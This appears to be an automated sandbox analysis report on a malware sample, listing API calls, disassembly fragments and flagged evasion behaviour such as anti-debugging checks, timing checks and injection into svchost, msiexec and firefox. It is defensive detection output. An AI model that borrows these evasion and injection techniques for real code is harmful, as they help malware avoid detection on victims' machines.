            Source: Binary string: wntdll.pdb source: p4rsJEIb7k.exe, 00000000.00000003.4325817635.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp, p4rsJEIb7k.exe, 00000000.00000003.4326551260.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.4724121009.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.4814046744.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.4814046744.000000000352D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.4721063151.0000000003000000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 00000003.00000003.4812614041.0000000004E19000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.8170719186.0000000005170000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.8170719186.000000000529D000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4816265673.0000000004FC1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: BlltrVxNMs.exe, 00000002.00000002.9389382295.000000000578C000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.000000000584C000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8169483298.00000000032F3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.00000000298EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: BlltrVxNMs.exe, 00000002.00000002.9389382295.000000000578C000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.000000000584C000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8169483298.00000000032F3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.00000000298EC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
            Source: p4rsJEIb7k.exeStatic PE information: real checksum: 0xa2135 should be: 0x15058a
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_004171D1 push ecx; ret 0_2_004171E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041197A push ecx; retf 1_2_0041197D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00407227 push cs; ret 1_2_0040723E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040AB29 pushad ; retf 1_2_0040AB2A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004183C4 push ss; retf 1_2_004183CE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403380 push eax; ret 1_2_00403382
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D45D push B7E85DDEh; ret 1_2_0040D462
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414412 push edx; iretd 1_2_0041441B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417F74 pushfd ; ret 1_2_00417F75
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040CF38 push ecx; retf 1_2_0040CF3E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034021AD pushad ; retf 0004h1_2_0340223F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034308CD push ecx; mov dword ptr [esp], ecx1_2_034308D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034097A1 push es; iretd 1_2_034097A8
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_015D315A push esp; ret 2_2_015D315B
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_015BE937 push es; iretd 2_2_015BE957
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_015BE83C push es; iretd 2_2_015BE957
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_015BE8A2 push es; iretd 2_2_015BE957
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_015C626B push ecx; retf 2_2_015C626E
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_015BF41A pushad ; retf 2_2_015BF41B
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_015C9FBE push ecx; retf 2_2_015C9FBF
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_015C9E70 push ecx; retf 2_2_015C9E71
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_05374529 pushad ; retf 2_2_0537452A
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_05381DC7 push ss; retf 2_2_05381DCE
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_0537EF7F push ecx; retf 2_2_0537EF80
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_05376E5D push B7E85DDEh; ret 2_2_05376E62
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_05376938 push ecx; retf 2_2_0537693E
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_05381974 pushfd ; ret 2_2_05381975
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_0537F0CD push ecx; retf 2_2_0537F0CE
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_0537B37A push ecx; retf 2_2_0537B37D
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exeCode function: 2_2_05370BF3 push cs; ret 2_2_05370C3E
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_051721AD pushad ; retf 0004h3_2_0517223F
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_004772DE
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Contains functionality to detect sleep reduction / modifications
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_004440780_2_00444078
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeAPI/Special instruction interceptor: Address: 454A70C
            Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FF9EBA0D144
            Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FF9EBA0D764
            Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FF9EBA0D324
            Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FF9EBA0D364
            Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FF9EBA0D004
            Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FF9EBA0FF74
            Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FF9EBA0D864
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347088E rdtsc 1_2_0347088E
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeAPI coverage: 3.1 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 1.3 %
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe TID: 3180Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7888Thread sleep count: 121 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7888Thread sleep time: -242000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7888Thread sleep count: 9673 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 7888Thread sleep time: -19346000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0044BD29 FindFirstFileW,CopyFileW,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,0_2_00475FE5
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0044BF8D FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470
            Source: firefox.exe, 00000004.00000002.5104537799.000001B8A9946000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
            Source: msiexec.exe, 00000003.00000002.8169483298.00000000032F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
            Source: BlltrVxNMs.exe, 00000002.00000002.9379519530.000000000132F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347088E rdtsc 1_2_0347088E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417583 LdrLoadDll,1_2_00417583
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0045A259 BlockInput,0_2_0045A259
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_04549348 mov eax, dword ptr fs:[00000030h]0_2_04549348
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0454A978 mov eax, dword ptr fs:[00000030h]0_2_0454A978
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0454A9D8 mov eax, dword ptr fs:[00000030h]0_2_0454A9D8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428347 mov eax, dword ptr fs:[00000030h]1_2_03428347
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428347 mov eax, dword ptr fs:[00000030h]1_2_03428347
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428347 mov eax, dword ptr fs:[00000030h]1_2_03428347
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A350 mov eax, dword ptr fs:[00000030h]1_2_0346A350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E363 mov eax, dword ptr fs:[00000030h]1_2_0346E363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E363 mov eax, dword ptr fs:[00000030h]1_2_0346E363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E363 mov eax, dword ptr fs:[00000030h]1_2_0346E363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E363 mov eax, dword ptr fs:[00000030h]1_2_0346E363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E363 mov eax, dword ptr fs:[00000030h]1_2_0346E363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E363 mov eax, dword ptr fs:[00000030h]1_2_0346E363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E363 mov eax, dword ptr fs:[00000030h]1_2_0346E363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E363 mov eax, dword ptr fs:[00000030h]1_2_0346E363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE372 mov eax, dword ptr fs:[00000030h]1_2_034AE372
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE372 mov eax, dword ptr fs:[00000030h]1_2_034AE372
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE372 mov eax, dword ptr fs:[00000030h]1_2_034AE372
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE372 mov eax, dword ptr fs:[00000030h]1_2_034AE372
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0371 mov eax, dword ptr fs:[00000030h]1_2_034B0371
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0371 mov eax, dword ptr fs:[00000030h]1_2_034B0371
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345237A mov eax, dword ptr fs:[00000030h]1_2_0345237A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D630E mov eax, dword ptr fs:[00000030h]1_2_034D630E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E310 mov eax, dword ptr fs:[00000030h]1_2_0344E310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E310 mov eax, dword ptr fs:[00000030h]1_2_0344E310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E310 mov eax, dword ptr fs:[00000030h]1_2_0344E310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346631F mov eax, dword ptr fs:[00000030h]1_2_0346631F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03468322 mov eax, dword ptr fs:[00000030h]1_2_03468322
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03468322 mov eax, dword ptr fs:[00000030h]1_2_03468322
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03468322 mov eax, dword ptr fs:[00000030h]1_2_03468322
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E328 mov eax, dword ptr fs:[00000030h]1_2_0342E328
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E328 mov eax, dword ptr fs:[00000030h]1_2_0342E328
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E328 mov eax, dword ptr fs:[00000030h]1_2_0342E328
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E3C0 mov eax, dword ptr fs:[00000030h]1_2_0342E3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E3C0 mov eax, dword ptr fs:[00000030h]1_2_0342E3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E3C0 mov eax, dword ptr fs:[00000030h]1_2_0342E3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C3C7 mov eax, dword ptr fs:[00000030h]1_2_0342C3C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034363CB mov eax, dword ptr fs:[00000030h]1_2_034363CB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034643D0 mov ecx, dword ptr fs:[00000030h]1_2_034643D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE3DD mov eax, dword ptr fs:[00000030h]1_2_034BE3DD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B43D5 mov eax, dword ptr fs:[00000030h]1_2_034B43D5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345A390 mov eax, dword ptr fs:[00000030h]1_2_0345A390
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345A390 mov eax, dword ptr fs:[00000030h]1_2_0345A390
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345A390 mov eax, dword ptr fs:[00000030h]1_2_0345A390
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D43BA mov eax, dword ptr fs:[00000030h]1_2_034D43BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D43BA mov eax, dword ptr fs:[00000030h]1_2_034D43BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AC3B0 mov eax, dword ptr fs:[00000030h]1_2_034AC3B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A200 mov eax, dword ptr fs:[00000030h]1_2_0342A200
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342821B mov eax, dword ptr fs:[00000030h]1_2_0342821B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0227 mov eax, dword ptr fs:[00000030h]1_2_034B0227
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0227 mov eax, dword ptr fs:[00000030h]1_2_034B0227
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0227 mov eax, dword ptr fs:[00000030h]1_2_034B0227
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A22B mov eax, dword ptr fs:[00000030h]1_2_0346A22B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A22B mov eax, dword ptr fs:[00000030h]1_2_0346A22B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A22B mov eax, dword ptr fs:[00000030h]1_2_0346A22B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03450230 mov ecx, dword ptr fs:[00000030h]1_2_03450230
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2E0 mov eax, dword ptr fs:[00000030h]1_2_0343A2E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2E0 mov eax, dword ptr fs:[00000030h]1_2_0343A2E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2E0 mov eax, dword ptr fs:[00000030h]1_2_0343A2E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2E0 mov eax, dword ptr fs:[00000030h]1_2_0343A2E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2E0 mov eax, dword ptr fs:[00000030h]1_2_0343A2E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2E0 mov eax, dword ptr fs:[00000030h]1_2_0343A2E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034382E0 mov eax, dword ptr fs:[00000030h]1_2_034382E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034382E0 mov eax, dword ptr fs:[00000030h]1_2_034382E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034382E0 mov eax, dword ptr fs:[00000030h]1_2_034382E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034382E0 mov eax, dword ptr fs:[00000030h]1_2_034382E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402F9 mov eax, dword ptr fs:[00000030h]1_2_034402F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402F9 mov eax, dword ptr fs:[00000030h]1_2_034402F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402F9 mov eax, dword ptr fs:[00000030h]1_2_034402F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402F9 mov eax, dword ptr fs:[00000030h]1_2_034402F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402F9 mov eax, dword ptr fs:[00000030h]1_2_034402F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402F9 mov eax, dword ptr fs:[00000030h]1_2_034402F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402F9 mov eax, dword ptr fs:[00000030h]1_2_034402F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402F9 mov eax, dword ptr fs:[00000030h]1_2_034402F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE289 mov eax, dword ptr fs:[00000030h]1_2_034AE289
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034542AF mov eax, dword ptr fs:[00000030h]1_2_034542AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034542AF mov eax, dword ptr fs:[00000030h]1_2_034542AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C2B0 mov ecx, dword ptr fs:[00000030h]1_2_0342C2B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A147 mov eax, dword ptr fs:[00000030h]1_2_0342A147
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A147 mov eax, dword ptr fs:[00000030h]1_2_0342A147
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A147 mov eax, dword ptr fs:[00000030h]1_2_0342A147
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346415F mov eax, dword ptr fs:[00000030h]1_2_0346415F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436179 mov eax, dword ptr fs:[00000030h]1_2_03436179
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03460118 mov eax, dword ptr fs:[00000030h]1_2_03460118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BA130 mov eax, dword ptr fs:[00000030h]1_2_034BA130
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034401C0 mov eax, dword ptr fs:[00000030h]1_2_034401C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034401C0 mov eax, dword ptr fs:[00000030h]1_2_034401C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A1E3 mov eax, dword ptr fs:[00000030h]1_2_0343A1E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A1E3 mov eax, dword ptr fs:[00000030h]1_2_0343A1E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A1E3 mov eax, dword ptr fs:[00000030h]1_2_0343A1E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A1E3 mov eax, dword ptr fs:[00000030h]1_2_0343A1E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A1E3 mov eax, dword ptr fs:[00000030h]1_2_0343A1E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F81EE mov eax, dword ptr fs:[00000030h]1_2_034F81EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F81EE mov eax, dword ptr fs:[00000030h]1_2_034F81EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034281EB mov eax, dword ptr fs:[00000030h]1_2_034281EB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034401F1 mov eax, dword ptr fs:[00000030h]1_2_034401F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034401F1 mov eax, dword ptr fs:[00000030h]1_2_034401F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034401F1 mov eax, dword ptr fs:[00000030h]1_2_034401F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434180 mov eax, dword ptr fs:[00000030h]1_2_03434180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434180 mov eax, dword ptr fs:[00000030h]1_2_03434180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434180 mov eax, dword ptr fs:[00000030h]1_2_03434180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E1A4 mov eax, dword ptr fs:[00000030h]1_2_0346E1A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E1A4 mov eax, dword ptr fs:[00000030h]1_2_0346E1A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034641BB mov ecx, dword ptr fs:[00000030h]1_2_034641BB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034641BB mov eax, dword ptr fs:[00000030h]1_2_034641BB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034641BB mov eax, dword ptr fs:[00000030h]1_2_034641BB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03460044 mov eax, dword ptr fs:[00000030h]1_2_03460044
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6040 mov eax, dword ptr fs:[00000030h]1_2_034B6040
